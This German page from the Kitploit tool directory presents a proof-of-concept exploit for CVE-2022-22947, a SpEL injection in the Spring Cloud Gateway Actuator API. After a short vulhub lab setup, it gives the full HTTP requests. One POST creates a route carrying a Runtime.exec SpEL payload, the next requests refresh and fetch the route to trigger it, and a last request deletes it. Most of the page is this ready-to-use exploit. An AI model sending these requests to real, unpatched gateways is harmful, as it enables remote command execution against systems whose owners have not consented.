Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-22947 — PoC-Exploit für CVE-2022-22947: SpEL-Injection in Spring Cloud Gateway, die über manipulierte Actuator-API-Routen die Ausführung von Befehlen aus der Ferne ermöglicht. | Kitploit
Tools/GitHubGitHub/greetdawn/cve-2022-22947
SchwachstellenanalyseExploitationWebanwendungs-ExploitationAPI-SicherheitstestsCommand and Control
GitHubgreetdawn/cve-2022-22947

CVE-2022-22947

PoC-Exploit für CVE-2022-22947: SpEL-Injection in Spring Cloud Gateway, die über manipulierte Actuator-API-Routen die Ausführung von Befehlen aus der Ferne ermöglicht.

Repository anzeigen
533vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-22947

Spring Cloud Gateway ist ein API-Gateway in Spring. In den Versionen 3.1.0 und 3.0.6 (einschließlich) sowie früher gibt es eine SpEL-Ausdrucksinjektionsschwachstelle. Wenn ein Angreifer auf die Actuator API zugreifen kann, kann er diese Schwachstelle ausnutzen, um beliebige Befehle auszuführen.

Angriffsumgebung

root@kitploit:~
git clone https://github.com/vulhub/vulhub/blob/master/spring/CVE-2022-22947/docker-compose.yml
docker-compose up -d

Exploitation

Senden Sie das folgende Datenpaket an die routes-Schnittstelle:

root@kitploit:~
POST /actuator/gateway/routes/greetdawn HTTP/1.1
Host: 192.168.2.68:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/json
Connection: close
Content-Length: 329

{
  "id": "greetdawn",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"}
  }],
"uri": "http://example.com",
"order": 0
}

image-20220303145822027

Obige Antwort zeigt, dass die neue Route erfolgreich erstellt wurde.

Senden Sie erneut das folgende Datenpaket, um die soeben hinzugefügte Route anzuwenden und die Ausführung des SpEL-Ausdrucks auszulösen:

root@kitploit:~
POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.2.68:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/json
Connection: close
Content-Length: 329


image-20220303150111513

Rufen Sie die soeben erstellte Route auf, um den schädlichen Code auszulösen:

root@kitploit:~
GET /actuator/gateway/routes/greetdawn HTTP/1.1
Host: 192.168.2.68:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/json
Connection: close
Content-Length: 0


image-20220303150238309

Hinweis: Löschen Sie die folgende Route:

root@kitploit:~
DELETE /actuator/gateway/routes/greetdawn HTTP/1.1
Host: 192.168.2.68:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/json
Connection: close
Content-Length: 0


image-20220303150340287

Tool herunterladen